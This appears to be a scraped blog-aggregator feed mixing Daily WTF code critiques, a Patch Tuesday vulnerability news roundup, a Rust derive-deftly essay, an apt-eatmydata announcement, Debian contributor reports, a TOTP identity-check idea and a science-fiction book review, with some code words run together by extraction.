publicstatic SqsClient create()
{
try {
SqsClientsqsClient= SqsClient.builder() ... .build();
return sqsClient;
} catch (Exception e) {
log.error("SQS - exception creating sqs client", e);
} finally {
// Uncomment this to test the sqs in a test environment// return SqsClient.builder(). ... .build();returnnull;
}
}
Eric found this when he discovered that the application wasn't sending messages to their queue. According to the logs, there were messages to send, they just weren't being sent.
Eric made the mistake of looking for log messages around sending messages, when instead he should have been looking at module startup, where the error message above appeared.
This code attempts to create a connection, and if it fails for any reason, it logs an error and returns null. With a delightful "comment this out" for running in the test environment, which, please, god no. Don't do configuration management by commenting out lines of code. Honestly, that's the worst thing in this code, to me.
In any case, the calling code "properly" handled nulls by just disabling sending to the queue silently, which made this harder to debug than it needed to be.
[Advertisement]
BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!
Author: Daniela Tabrea The soft roar of the circulation pumps bid her a warm welcome. Maybe not warm, but sterile. Exactly what she’d been looking for. Jaimee hoped this would be the last time she ever moved apartments. Her previous place was substandard, to say the least. The landlord distilled heavy liquor in the building […]
Microsoft today issued security updates to fix at least 56 vulnerabilities in its Windows operating systems and supported software, including two zero-day flaws that are being actively exploited.
All supported Windows operating systems will receive an update this month for a buffer overflow vulnerability that carries the catchy name CVE-2025-21418. This patch should be a priority for enterprises, as Microsoft says it is being exploited, has low attack complexity, and no requirements for user interaction.
Tenable senior staff research engineer Satnam Narang noted that since 2022, there have been nine elevation of privilege vulnerabilities in this same Windows component — three each year — including one in 2024 that was exploited in the wild as a zero day (CVE-2024-38193).
“CVE-2024-38193 was exploited by the North Korean APT group known as Lazarus Group to implant a new version of the FudModule rootkit in order to maintain persistence and stealth on compromised systems,” Narang said. “At this time, it is unclear if CVE-2025-21418 was also exploited by Lazarus Group.”
The other zero-day, CVE-2025-21391, is an elevation of privilege vulnerability in Windows Storage that could be used to delete files on a targeted system. Microsoft’s advisory on this bug references something called “CWE-59: Improper Link Resolution Before File Access,” says no user interaction is required, and that the attack complexity is low.
Adam Barnett, lead software engineer at Rapid7, said although the advisory provides scant detail, and even offers some vague reassurance that ‘an attacker would only be able to delete targeted files on a system,’ it would be a mistake to assume that the impact of deleting arbitrary files would be limited to data loss or denial of service.
“As long ago as 2022, ZDI researchers set out how a motivated attacker could parlay arbitrary file deletion into full SYSTEM access using techniques which also involve creative misuse of symbolic links,”Barnett wrote.
One vulnerability patched today that was publicly disclosed earlier is CVE-2025-21377, another weakness that could allow an attacker to elevate their privileges on a vulnerable Windows system. Specifically, this is yet another Windows flaw that can be used to steal NTLMv2 hashes — essentially allowing an attacker to authenticate as the targeted user without having to log in.
According to Microsoft, minimal user interaction with a malicious file is needed to exploit CVE-2025-21377, including selecting, inspecting or “performing an action other than opening or executing the file.”
“This trademark linguistic ducking and weaving may be Microsoft’s way of saying ‘if we told you any more, we’d give the game away,'” Barnett said. “Accordingly, Microsoft assesses exploitation as more likely.”
The SANS Internet Storm Center has a handy list of all the Microsoft patches released today, indexed by severity. Windows enterprise administrators would do well to keep an eye on askwoody.com, which often has the scoop on any patches causing problems.
It’s getting harder to buy Windows software that isn’t also bundled with Microsoft’s flagship Copilot artificial intelligence (AI) feature. Last month Microsoft started bundling Copilot with Microsoft Office 365, which Redmond has since rebranded as “Microsoft 365 Copilot.” Ostensibly to offset the costs of its substantial AI investments, Microsoft also jacked up prices from 22 percent to 30 percent for upcoming license renewals and new subscribers.
Office-watch.com writes that existing Office 365 users who are paying an annual cloud license do have the option of “Microsoft 365 Classic,” an AI-free subscription at a lower price, but that many customers are not offered the option until they attempt to cancel their existing Office subscription.
In other security patch news, Apple has shipped iOS 18.3.1, which fixes a zero day vulnerability (CVE-2025-24200) that is showing up in attacks.
Adobe has issued security updates that fix a total of 45 vulnerabilities across InDesign, Commerce, Substance 3DStager, InCopy, Illustrator, Substance 3D Designer and Photoshop Elements.
Chris Goettl at Ivanti notes that Google Chrome is shipping an update today which will trigger updates for Chromium based browsers including Microsoft Edge, so be on the lookout for Chrome and Edge updates as we proceed through the week.
derive-deftly is a template-based derive-macro facility for Rust. It has been a great success. Your codebase may benefit from it too!
Rust programmers will appreciate its power, flexibility, and consistency, compared to macro_rules; and its convenience and simplicity, compared to proc macros.
Programmers coming to Rust from scripting languages will appreciate derive-deftly’s convenient automatic code generation, which works as a kind of compile-time introspection.
I’m often a fan of metaprogramming, including macros. They can help remove duplication and flab, which are often the enemy of correctness.
Rust has two macro systems. derive-deftly offers much of the power of the more advanced (proc_macros), while beating the simpler one (macro_rules) at its own game for ease of use.
(Side note: Rust has at least three other ways to do metaprogramming: generics; build.rs; and, multiple module inclusion via #[path=]. These are beyond the scope of this blog post.)
macro_rules! aka “pattern macros”, “declarative macros”, or sometimes “macros by example” are the simpler kind of Rust macro.
They involve writing a sort-of-BNF pattern-matcher, and a template which is then expanded with substitutions from the actual input. If your macro wants to accept comma-separated lists, or other simple kinds of input, this is OK. But often we want to emulate a #[derive(...)] macro: e.g., to define code based on a struct, handling each field. Doing that with macro_rules is very awkward:
macro_rules!’s pattern language doesn’t have a cooked way to match a data structure, so you have to hand-write a matcher for Rust syntax, in each macro. Writing such a matcher is very hard in the general case, because macro_rules lacks features for matching important parts of Rust syntax (notably, generics). (If you really need to, there’s a horrible technique as a workaround.)
And, the invocation syntax for the macro is awkward: you must enclose the whole of the struct in my_macro! { }. This makes it hard to apply more than one macro to the same struct, and produces rightward drift.
Enclosing the struct this way means the macro must reproduce its input - so it can have bugs where it mangles the input, perhaps subtly. This also means the reader cannot be sure precisely whether the macro modifies the struct itself. In Rust, the types and data structures are often the key places to go to understand a program, so this is a significant downside.
macro_rules also has various other weird deficiencies too specific to list here.
Overall, compared to (say) the C preprocessor, it’s great, but programmers used to the power of Lisp macros, or (say) metaprogramming in Tcl, will quickly become frustrated.
Rust’s second macro system is much more advanced. It is a fully general system for processing and rewriting code. The macro’s implementation is Rust code, which takes the macro’s input as arguments, in the form of Rust tokens, and returns Rust tokens to be inserted into the actual program.
This approach is more similar to Common Lisp’s macros than to most other programming languages’ macros systems. It is extremely powerful, and is used to implement many very widely used and powerful facilities. In particular, proc macros can be applied to data structures with #[derive(...)]. The macro receives the data structure, in the form of Rust tokens, and returns the code for the new implementations, functions etc.
This is used very heavily in the standard library for basic features like #[derive(Debug)] and Clone, and for important libraries like serde and strum.
But, it is a complete pain in the backside to write and maintain a proc_macro.
The Rust types and functions you deal with in your macro are very low level. You must manually handle every possible case, with runtime conditions and pattern-matching. Error handling and recovery is so nontrivial there are macro-writing libraries and even more macros to help. Unlike a Lisp codewalker, a Rust proc macro must deal with Rust’s highly complex syntax. You will probably end up dealing with syn, which is a complete Rust parsing library, separate from the compiler; syn is capable and comprehensive, but a proc macro must still contain a lot of often-intricate code.
There are build/execution environment problems. The proc_macro code can’t live with your application; you have to put the proc macros in a separate cargo package, complicating your build arrangements. The proc macro package environment is weird: you can’t test it separately, without jumping through hoops. Debugging can be awkward. Proper tests can only realistically be done with the help of complex additionaltools, and will involve a pinned version of Nightly Rust.
This is a nice example, also, of how using a macro can avoid bugs. Implementing this update by hand without a macro would involve a lot of cut-and-paste. When doing that cut-and-paste it can be very easy to accidentally write bugs where you forget to update some parts of each of the copies:
Spot the mistake? We copy status to info. Bugs like this are extremely common, and not always found by the type system. derive-deftly can make it much easier to make them impossible.
Because of the difficult and cumbersome nature of proc macros, very few projects have site-specific, special-purpose #[derive(...)] macros.
The Articodebase has no bespoke proc macros, across its 240kloc and 86 crates. (We did fork one upstream proc macro package to add a feature we needed.) I have only one bespoke, case-specific, proc macro amongst all of my personal Rust projects; it predates derive-deftly.
Since we have started using derive-deftly in Arti, it has become an important tool in our toolbox. We have 37 bespoke derive macros, done with derive-deftly. Of these, 9 are exported for use by downstream crates. (For comparison there are 176 macro_rules macros.)
In my most recent personal Rust project, I have 22 bespoke derive macros, done with with derive-deftly, and 19 macro_rules macros.
derive-deftly macros are easy and straightforward enough that they can be used as readily as macro_rules macros. Indeed, they are often clearer than a macro_rules macro.
But declaring it 1.0 doesn’t mean that it won’t improve further.
Our ticket tracker has a laundry list of possible features. We’ll sometimes be cautious about committing to these, so we’ve added a beta feature flag, for opting in to less-stable features, so that we can prototype things without painting ourselves into a corner. And, we intend to further develop the Guide.
Tired of waiting for apt to finish installing packages? Wish there were a way to make your installations blazingly fast without caring about minor things like, oh, data integrity? Well, today is your lucky day!
I’m thrilled to introduce apt-eatmydata, now available for Debian and all supported Ubuntu releases!
What Is apt-eatmydata?
If you’ve ever used libeatmydata, you know it’s a nifty little hack that disables fsync() and friends, making package installations way faster by skipping unnecessary disk writes. Normally, you’d have to remember to wrap apt commands manually, like this:
eatmydata apt install texlive-full
But who has time for that? apt-eatmydata takes care of this automagically by integrating eatmydata seamlessly into apt itself! That means every package install is now turbocharged—no extra typing required.
How to Get It
Debian
If you’re on Debian unstable/testing (or possibly soon in stable-backports), you can install it directly with:
sudo apt install apt-eatmydata
Ubuntu
Ubuntu users already enjoy faster package installation thanks to zstd-compressed packages and to switch to even higher gear I’ve backported apt-eatmydata to all supported Ubuntu releases. Just add this PPA and install:
And boom! Your apt install times are getting serious upgrade. Let’s run some tests…
# pre-download package to measure only the installation $ sudo apt install -d linux-headers-6.8.0-53-lowlatency ... # installation time is 9.35s without apt-eatmydata: $ sudo time apt install linux-headers-6.8.0-53-lowlatency ... 2.30user 2.12system 0:09.35elapsed 47%CPU (0avgtext+0avgdata 174680maxresident)k 32inputs+1495216outputs (0major+196945minor)pagefaults 0swaps $ sudo apt install apt-eatmydata ... $ sudo apt purge linux-headers-6.8.0-53-lowlatency # installation time is 3.17s with apt-eatmydata: $ sudo time eatmydata apt install linux-headers-6.8.0-53-lowlatency 2.30user 0.88system 0:03.17elapsed 100%CPU (0avgtext+0avgdata 174692maxresident)k 0inputs+205664outputs (0major+198099minor)pagefaults 0swaps
apt-eatmydata just made installing Linux headers 3x faster!
But Wait, There’s More!
If you’re automating CI builds, there’s even a GitHub Action to make your workflows faster essentially doing what apt-eatmydata does, just setting it up in less than a second! Check it out here: GitHub Marketplace: apt-eatmydata
Should You Use It?
Warning:apt-eatmydatais not for all production environments. If your system crashes mid-install, you might end up with a broken package database. But for throwaway VMs, containers, and CI pipelines? It’s an absolute game-changer. I use it on my laptop, too.
So go forth and install recklessly fast!
If you run into any issues, feel free to file a bug or drop a comment. Happy hacking!
Recently createrepo-c on Debian unstable was updated from 0.17.3 to 1.2.0.
It introduces breaking compatibility about metadata (repodata/*).
In the previous versions, generated metadata was compressed in gz format, newer version use zst compression instead.
This kills some yum client to work because old yum client can't handle newer metadata format correctly.
At least, (as far as I know) it affects on AmazonLinux 2 for example.
To keep compatibility with such a old platform, need to specify --compatibility option for createrepo-c.
Author: Majoki Still puzzled, Mya Kirin fixated on the sign: Last Casket Company. The moniker didn’t make much sense, but she’d always felt a calling to look into the unexplained. To push for answers. She wished it could’ve been a real job. A job she was paid to do. A job that was once called […]
As the saying goes, there are only two hard problems in computer science: naming things, cache invalidations, and off by one errors. Chris's predecessor decided to tackle the second one, mostly by accurately(?) naming a class:
classSimpleCache
{
}
This is, in fact, the simplest cache class I can imagine. Arguably, it's a bit too simple.
Instances of this class abound in code, though no one is entirely sure why. Future optimization? Just no one understanding what they're doing? Oh right, it's that one. It's always no one understanding what they're doing.
[Advertisement]
Keep all your packages and Docker containers in one place, scan for vulnerabilities, and control who can access different feeds. ProGet installs in minutes and has a powerful free version with a lot of great features that you can upgrade when ready.Learn more.
Python 3.13 is now the default Python 3 version in Debian, by Stefano Rivera and Colin Watson
The Python 3.13 as default transition has now completed. The next step is to
remove Python 3.12 from the archive, which should be very straightforward, it
just requires rebuilding C extension packages in no particular order. Stefano
fixed some miscellaneous bugs blocking the completion of the 3.13 as default
transition.
Fixing qtpaths6 for cross compilation, by Helmut Grohne
While Qt5 used to use qmake to query installation properties, Qt6 is moving
more and more to CMake and to ease that transition it relies on more qtpaths.
Since this tool is not naturally aware of the architecture it is called for, it
tends to produce results for the build architecture. Therefore, more than 100
packages were picking up a multiarch directory for the build architecture during
cross builds. In collaboration with the Qt/KDE team and Sandro Knauß in
particular (none affiliated with Freexian), we added an architecture-specific
wrapper script in the same way qmake has one for Qt5 and Qt6 already. The
relevant CMake module has been updated to prefer the triplet-prefixed wrapper.
As a result, most of the KDE packages now cross build on unstable ready in time
for the trixie release.
/usr-move, by Helmut Grohne
In December, Emil Södergren reported that a live-build was not working for him
and in January, Colin Watson reported that the proposed mitigation for
debian-installer-utils would practically fail. Both failures were to be
attributed to a wrong understanding of implementation-defined behavior in
dpkg-divert. As a
result, all M18 mitigations had to be reviewed and many of them replaced. Many
have been uploaded already and all instances have received updated patches.
Even though dumat has been in
operation for more than a year, it gained recent changes. For one thing,
analysis of architectures other than amd64 was requested. Chris Hofstaedler
(not affiliated with Freexian) kindly provided computing resources for
repeatedly running it on the larger set. Doing so revealed various
cross-architecture undeclared file conflicts in gcc, glibc, and
binutils-z80, but it also revealed a previously unknown /usr-move issue in
rpi.rpi-common. On top of that, dumat produced false positive diagnostics
and wrongly associated Debian bugs in some cases, both of which have now been
fixed. As a result, a supposedly fixed python3-sepolicy issue had to be
reopened.
rebootstrap, by Helmut Grohne
As much as we think of our base system as stable, it is changing a lot and the
architecture cross bootstrap tooling is very sensitive to such changes requiring
permanent maintenance. A problem that recently surfaced was that building a
binutils cross toolchain would result in a binutils-for-host package that
would not be practically installable as it would depend on a binutils-common
package that was not built. This turned into an examination of binutils-common
and noticing that it actually differed across architectures even though it
should not. Johannes Schauer Marin Rodrigues (not affiliated with Freexian) and
Colin Watson kindly helped brainstorm possible solutions. Eventually, Helmut
provided a patch to move gprofng bits out of
binutils-common. Independently, Matthias Klose
(not affiliated with Freexian) split out binutils-gold into a separate source
package. As a result, binutils-common is now equal across architectures and
can be marked Multi-Arch: foreign resolving the initial problem.
Salsa CI, by Santiago Ruano Rincón
Santiago continued the work about the sbuild support for Salsa CI, that was
mentioned in the previous month
report. The
!568
merge request that created the new build image was merged, making it easier to
test !569
with external projects. Santiago used a fork of the debusine repo to try the
draft !569,
and some issues were spotted, and part of them fixed. This is the last debusine
pipeline run with the current
!569:
https://salsa.debian.org/santiago/debusine/-/pipelines/794233.
One of the last improvements relates to how to enable projects to customize the
pipeline, in an equivalent way than they currently do in the extract-source
and build jobs. While this is work-in-progress, the results are rather
promising. Next steps include deciding on introducing schroot support for
bookworm, bookworm-security, and older releases, as they are done in the
official debian buildd.
DebConf preparations, by Stefano Rivera and Santiago Ruano Rincón
DebConf will be happening in Brest, France, in July. Santiago continued the
DebConf 25 organization work, looking for catering providers.
Both Stefano and Santiago have been reaching out to some potential sponsors.
DebConf depends on sponsors to cover the organization cost, if your company
depends on Debian, please consider sponsoring
DebConf.
Stefano has been winding up some of the finances from previous DebConfs.
Finalizing reimbursements to team members from DebConf 23, and handling some
outstanding issues from DebConf 24. Stefano and the rest of the DebConf
committee have been reviewing bids for DebConf 26, to select the next venue.
Ruby 3.3 is now the default Ruby interpreter, by Lucas Kanashiro
Ruby 3.3 is about to become the default Ruby interpreter for Trixie. Many bugs
were fixed by Lucas and the Debian Ruby team during the sprint hold in Paris
during Jan 27-31. The
next step is to remove support of Ruby 3.1, which is the alternative Ruby
interpreter for now. Thanks to the Debian Release team for all the support,
especially Emilio Pozuelo Monfort.
Rails 7 transition, by Lucas Kanashiro
Rails 6 has been shipped by Debian since Bullseye, and as a WEB framework, many
issues (especially security related issues) have been encountered and the
maintainability of it becomes harder and harder. With that in mind, during the
Debian Ruby team sprint last
month, the transition to
Rack 3 (an important dependency of rails containing many breaking changes) was
started in Debian unstable, it is ongoing. Once it is done, the Rails 7
transition will take place, and Rails 7 should be shipped in Debian Trixie.
Miscellaneous contributions
Stefano improved a poor ImportError for users of the turtle module on Python
3, who haven’t installed the python3-tk package.
Stefano updated several packages to new upstream releases.
Stefano added the Python extension to the re2 package, allowing for the use
of the Google RE2 regular expression library as a direct replacement for the
standard library re module.
Stefano started provisioning a new physical server for the
debian.social infrastructure.
Carles improved simplemonitor (documentation on systemd integration, worked
with upstream for fixing a bug).
Carles upgraded packages to new upstream versions: python-ring-doorbell and
python-asyncclick.
Carles did po-debconf translations to Catalan: reviewed 44 packages and
submitted translations to 90 packages (via salsa merge requests or bugtracker
bugs).
Carles maintained po-debconf-manager with small fixes.
Raphaël worked on some outstanding
DEP-14merge
request and
participated in the associated discussion. The discussions have been more
contentious than anticipated, somewhat exacerbated by Otto’s desire to
conclude fast while the required tool support is not yet there.
Raphaël, with the help of Philipp Kern from the DSA team, upgraded
tracker.debian.org to use Django 4.2 (from bookworm-backports) which in turn
enabled him to configure authentication via salsa.debian.org. It’s now
possible to login to tracker.debian.org with your salsa credentials!
Raphaël updated zim — a nice desktop wiki that is very handy to organize
your day-to-day digital life — to the latest upstream version (0.76).
I'm not sure whether to laugh or cry over this:Federal judges have issued President Donald Trump
stinging legal rebukes in the early clashes over his blitz of executive
orders, and two of his top aides have responded by suggesting that his
administration defy the courts and move forward with its agenda.There’s no indication that Trump has adopted such a strategy, although a U.S. judge in Rhode
It is a while since I posted a summary of the free software and
open culture activities and projects I have worked on. Here is a
quick summary of the major ones from last year.
I guess the biggest project of the year has been migrating orphaned
packages in Debian without a version control system to have a git
repository on salsa.debian.org. When I started in April around 450
the orphaned packages needed git. I've since migrated around 250 of
the packages to a salsa git repository, and around 40 packages were
left when I took a break. Not sure who did the around 160 conversions
I was not involved in, but I am very glad I got some help on the
project. I stopped partly because some of the remaining packages
needed more disk space to build than I have available on my
development machine, and partly because some had a strange build setup
I could not figure out. I had a time budget of 20 minutes per
package, if the package proved problematic and likely to take longer,
I moved to another package. Might continue later, if I manage to free
up some disk space.
Another rather big project was the translation to Norwegian Bokmål
and publishing of the first book ever published by a Sámi woman, the
«Møter
vi liv eller død?» book by Elsa Laula, with a PD0 and CC-BY
license. I released it during the summer, and to my surprise it has
already sold several copies. As I suck at marketing, I did not expect
to sell any.
A smaller, but more long term project (for more than 10 years now),
and related to orphaned packages in Debian, is my project to ensure a
simple way to install hardware related packages in Debian when the
relevant hardware is present in a machine. It made a fairly big
advance forward last year, partly because I have been poking and
begging package maintainers and upstream developers to include
AppStream metadata XML in their packages. I've also released a few
new versions of the isenkram system with some robustness improvements.
Today 127 packages in Debian provide such information, allowing
isenkram-lookup to propose them. Will keep pushing until the
around 35 package names currently hard coded in the isenkram package
are down to zero, so only information provided by individual packages
are used for this feature.
As part of the work on AppStream, I have sponsored several packages
into Debian where the maintainer wanted to fix the issue but lacked
direct upload rights. I've also sponsored a few other packages, when
approached by the maintainer.
I would also like to mention two hardware related packages in
particular where I have been involved, the megactl and mfi-util
packages. Both work with the hardware RAID systems in several Dell
PowerEdge servers, and the first one is already available in Debian
(and of course, proposed by isenkram when used on the appropriate Dell
server), the other is waiting for NEW processing since this autumn. I
manage several such Dell servers and would like the tools needed to
monitor and configure these RAID controllers to be available from
within Debian out of the box.
Vaguely related to hardware support in Debian, I have also been
trying to find ways to help out the Debian ROCm team, to improve the
support in Debian for my artificial idiocy (AI) compute node. So far
only uploaded one package, helped test the initial packaging of
llama.cpp and tried to figure out how to get good speech recognition
like Whisper into Debian.
I am still involved in the LinuxCNC project, and organised a
developer gathering in Norway last summer. A new one is planned the
summer of 2025. I've also helped evaluate patches and uploaded new
versions of LinuxCNC into Debian.
After a 10 years long break, we managed to get a new and improved
upstream version of lsdvd released just before Christmas. As
I use it regularly to maintain my DVD archive, I was very happy to
finally get out a version supporting DVDDiscID useful for uniquely
identifying DVDs. I am dreaming of a Internet service mapping DVD IDs
to IMDB movie IDs, to make life as a DVD collector easier.
My involvement in Norwegian archive standardisation and the free
software implementation of the vendor neutral Noark 5 API continued
for the entire year. I've been pushing patches into both the API and
the test code for the API, participated in several editorial meetings
regarding the Noark 5 Tjenestegrensesnitt specification, submitted
several proposals for improvements for the same. We also organised a
small seminar for Noark 5 interested people, and is organising a new
seminar in a month.
Andrew worked with Stuart. Stuart was one of those developers who didn't talk to anyone except to complain about how stupid management was, or how stupid the other developers were. Stuart was also the kind of person who would suddenly go on a tear, write three thousand lines of code in an evening, and then submit an pull request. He wouldn't respond to PR comments, however, and just wait until management needed the feature merged badly enough that someone said, "just approve it so we can move on."
int iDisplayFlags = objectProps.DisplayInfo.BackgroundPrintFlags;
bool bForceBackgroundOn = false;
bool bForceBackgroundOff = false;
// Can't use _displayTypeID because it will always be 21 since text displays as imageif (_fileTypeID == 11) // TEXT
{
if ((iDisplayFlags & 0x1008) != 0) // Text Background is required
{
bForceBackgroundOn = true;
}
elseif ((iDisplayFlags & 0x1001) != 0) // Text Background is not available
{
bForceBackgroundOff = true;
}
}
elseif (_displayTypeID == 21) // IMAGE
{
if ((iDisplayFlags & 0x1200) != 0) // Image Background is required
{
bForceBackgroundOn = true;
}
elseif ((iDisplayFlags & 0x1040) != 0) // Image Background is not available
{
bForceBackgroundOff = true;
}
}
bool useBackground = bForceBackgroundOn;
// If an object does not have an Background and we try to use it, bad things happen.// So we check to see if we really have an Background, if not we don't want to try and use itif (!useBackground && objectProps.DisplayInfo.Background)
{
useBackground = Convert.ToBoolean(BackgroundShown);
}
if (bForceBackgroundOff)
{
useBackground = false;
}
This code is inside of a document viewer application. As you might gather from skimming it, the viewer will display text (as an image) or images (as an image) and may or may not display a background as part of it.
This code, of course, uses a bunch of magic numbers and bitwise operators, which is always fun. We don't need any constants. It's important to note that all the other developers on the project did use enumerations and constants. The values were defined and well organized in the code- Stuart simply chose not to use them.
You'll note that there's some comments and confusion about how we can't use _displayTypeID because text always displays as an image. I'm going to let Andrew explain this:
The client this code exists in renders text documents to images (for reasons that aren’t relevant) when presenting them to the user. We have a multitude of filetypes that we do similar actions with, and fileTypes are user configurable. Because of this, we also keep track of the display type. This allows the user to configure a multitude of filetypes, and depending on the display type configured for the file type, we know if we can show it in our viewer. In the case of display type ‘text’ our viewer ultimately renders the text as an image. At some point in time Stuart decided that since the final product of a text document is an image, we should convert display type text over to image when referencing it in code (hence the comment ‘Can’t use display type ID’). If none of this paragraph makes any sense to you, then you’re not alone, because the second someone competent got wind of this, they thankfully nixed the idea and display type text, went back to meaning display type text (aka this goes through OUR TEXT RENDERER).
What I get from that paragraph is that none of this makes sense, but it's all Stuart's fault.
What makes this special is that the developer is writing code to control a binary status: "do we show a background or not?", but needs two booleans to handle this case. We have a bForceBackgroundOn and a bForceBackgroundOff.
So, tracing through, if we're text and any of the bits 0x1008 are set in iDisplayFlags, we want the background on. Otherwise, if any of the bits 0x1001 are set, we want to force the background off. If it's an image, we do the same thing, though for 0x1200 and 0x1040 respectively.
Then, we stuff bForceBackgroundOn into a different variable, useBackground. If that is false and a different property flag is set, we'll check the value of BackgroundShown- which we choose to convert to boolean which implies that it isn't a boolean, which raises its own questions, except it actually is a boolean value, and Stuart just didn't understand how to deal with a nullable boolean. Finally, after all this work, we check the bForceBackgroundOff value, and if that's true, we set useBackground to false.
I'll be frank, none of this quite makes sense to me, and I can certainly imagine a world where the convoluted process of having a "on" and "forceOff" variable actually makes sense, so I'd almost think this code isn't that bad- except for this little detail, from Andrew:
The final coup de grace is that all of the twisted logic for determining if the background is needed is completely unnecessary. When the call to retrieve the file to display is made, another method checks to see if the background was requested (useBackground), and performs the same logic check (albeit in a sane manner) as above.
Here’s an easy system for two humans to remotely authenticate to each other, so they can be sure that neither are digital impersonations.
To mitigate that risk, I have developed this simple solution where you can setup a unique time-based one-time passcode (TOTP) between any pair of persons.
This is how it works:
Two people, Person A and Person B, sit in front of the same computer and open this page;
They input their respective names (e.g. Alice and Bob) onto the same page, and click “Generate”;
The page will generate two TOTP QR codes, one for Alice and one for Bob;
Alice and Bob scan the respective QR code into a TOTP mobile app (such as Authy or Google Authenticator) on their respective mobile phones;
In the future, when Alice speaks with Bob over the phone or over video call, and wants to verify the identity of Bob, Alice asks Bob to provide the 6-digit TOTP code from the mobile app. If the code matches what Alice has on her own phone, then Alice has more confidence that she is speaking with the real Bob.
Author: Julian Miles, Staff Writer The com lights up. Sally: Bradford, New Britannia, Earth? What the? How long has it been? I stop rushing and let my AIde handle it. “I’m supposing you’ve not heard-” “You have reached the residence of Chris Utten. This is Alice, his AIde. Speak now to leave a message.” “Hellfire […]
The Scavenger Door is a science fiction adventure and the third
book of the Finder Chronicles. While each of the books of this series
stand alone reasonably well, I would still read the series in order. Each
book has some spoilers for the previous book.
Fergus is back on Earth following the events of Driving the Deep, at loose ends and annoying his relatives. To
get him out of their hair, his cousin sends him into the Scottish hills to
find a friend's missing flock of sheep. Fergus finds things
professionally, but usually not livestock. It's an easy enough job,
though; the lead sheep was wearing a tracker and he just has to get close
enough to pick it up. The unexpected twist is also finding a metal
fragment buried in a hillside that has some strange resonance with the
unwanted gift that Fergus got in Finder.
Fergus's alien friend Ignatio is so alarmed by the metal fragment that he
turns up in person in Fergus's cousin's bar in Scotland. Before he
arrives, Fergus gets a mysteriously infuriating warning visit from alien
acquaintances he does not consider friends. He has, as usual, stepped into
something dangerous and complicated, and now somehow it's become his
problem.
So, first, we get lots of Ignatio, who is an enthusiastic large ball of
green fuzz with five limbs who mostly speaks English but does so from an
odd angle. This makes me happy because I love Ignatio and his tendency to
take things just a bit too literally.
SANTO'S, the sign read. Under it, in smaller letters, was CURIOSITIES
AND INCONVENIENCES FOR COMMENDABLE SUMS.
"Inconveniences sound just like my thing," Fergus said. "You
two want to wait in the car while I check it out?"
"Oh, no, I am not missing this," Isla said, and got out of the podcar.
"I am uncertain," Ignatio said. "I would like some curiouses, but not
any inconveniences. Please proceed while I decide, and if there is
also murdering or calamity or raisins, you will yell right away, yes?"
Also, if your story setup requires a partly-understood alien artifact that
the protagonist can get some explanations for but not have the mystery
neatly solved for them, Ignatio's explanations are perfect.
"It is a door. A doorbell. A... peephole? A key. A control light. A
signal. A stop-and-go sign. A road. A bridge. A beacon. A call. A map.
A channel. A way," Ignatio said. "It is a problem to explain. To say a
doorkey is best, and also wrong. If put together, a path may be
opened."
"And then?"
"And then the bad things on the other side, who we were trying to lock
away, will be free to travel through."
Second, the thing about Palmer's writing that continues to impress me is
her ability to take a standard science fiction plot, one whose variations
I've read probably dozens of times before, and still make it utterly
engrossing. This book is literally a fetch quest. There are a bunch of
scattered fragments, Fergus has to find them and keep them from being
assembled, various other people are after the same fragments, and Fergus
either has to get there first or get the fragments back from them. If you
haven't read this book before, you've played the video game or watched the
movie. The threat is basically a Stargate SG-1 plot. And yet, this
was so much fun.
The characters are great. This book leans less on found family than the
last one and a bit more on actual family. When I started reading this
series, Fergus felt a bit bland in the way that adventure protagonists
sometimes can, but he's fleshed out nicely as the series goes along. He's
not someone who tends to indulge in big emotions, but now the reader can
tell that's because he's the kind of person who finds things to do in
order to keep from dwelling on things he doesn't want to think about. He's
unflappable in a quietly competent way while still having a backstory and
emotional baggage and a rich inner life that the reader sees in glancing
fragments.
We get more of Fergus's backstory, particularly around Mars, but I like
that it's told in anecdotes and small pieces. The last thing Fergus wants
to do is wallow in his past trauma, so he doesn't and finds something to
do instead. There's just enough detail around the edges to deepen his
character without turning the book into a story about Fergus's emotions
and childhood. It's a tricky balancing act that Palmer handles well.
There are also more sentient ships, and I am so in favor of more sentient
ships.
"When I am adding a new skill, I import diagnostic and environmental
information specific to my platform and topology, segregate the skill
subroutines to a dedicated, protected logical space, run incremental
testing on integration under all projected scenarios and variables,
and then when I am persuaded the code is benevolent, an asset, and
provides the functionality I was seeking, I roll it into my primary
processing units," Whiro said. "You cannot do any of that,
because if I may speak in purely objective terms you may incorrectly
interpret as personal, you are made of squishy, unreliable
goo."
We get the normal pieces of a well-done fetch quest: wildly varying
locations, some great local characters (the US-based trauma surgeons on
vacation in Australia were my favorites), and believable antagonists.
There are two other groups looking for the fragments, and while one of
them is the standard villain in this sort of story, the other is an
apocalyptic cult whose members Fergus mostly feels sorry for and who add
just the right amount of surreality to the story. The more we find out
about them, the more believable they are, and the more they make this
world feel like realistic messy chaos instead of the obvious (and boring)
good versus evil patterns that a lot of adventure plots collapse into.
There are things about this book that I feel like I should be criticizing,
but I just can't. Fetch quests are usually synonymous with lazy plotting,
and yet it worked for me. The way Fergus gets dumped into the middle of
this problem starts out feeling as arbitrary and unmotivated as some video
game fetch quest stories, but by the end of the book it starts to make
sense. The story could arguably be described as episodic and cliched, and
yet I was thoroughly invested. There are a few pacing problems at the very
end, but I was too invested to care that much. This feels like a book
that's better than the sum of its parts.
Most of the story is future-Earth adventure with some heist elements. The
ending goes in a rather different direction but stays at the center of the
classic science fiction genre. The Scavenger Door reaches a
satisfying conclusion, but there are a ton of unanswered questions that
will send me on to the fourth (and reportedly final) novel in the series
shortly.
This is great stuff. It's not going to win literary awards, but if you're
in the mood for some classic science fiction with fun aliens and neat
ideas, but also benefiting from the massive improvements in
characterization the genre has seen in the past forty years, this series
is perfect. Highly recommended.
20 years ago, I got my Debian Developer account. I was 18 at the time, it was Shrove Tuesday and - as is customary - I was drunk when I got the email. There was so much that I did not know - which is also why the process took 1.5 years from the time I applied. I mostly only maintained a package or two. I'm still amazed that Christian Perrier and Joerg Jaspert put sufficient trust in me at that time. Nevertheless now feels like a good time for a personal reflection of my involvement in Debian.
During my studies I took on more things. In January 2008 I joined the Release
Team as an assistant, which taught me a lot of code review. I have been an Application Manager on the side.
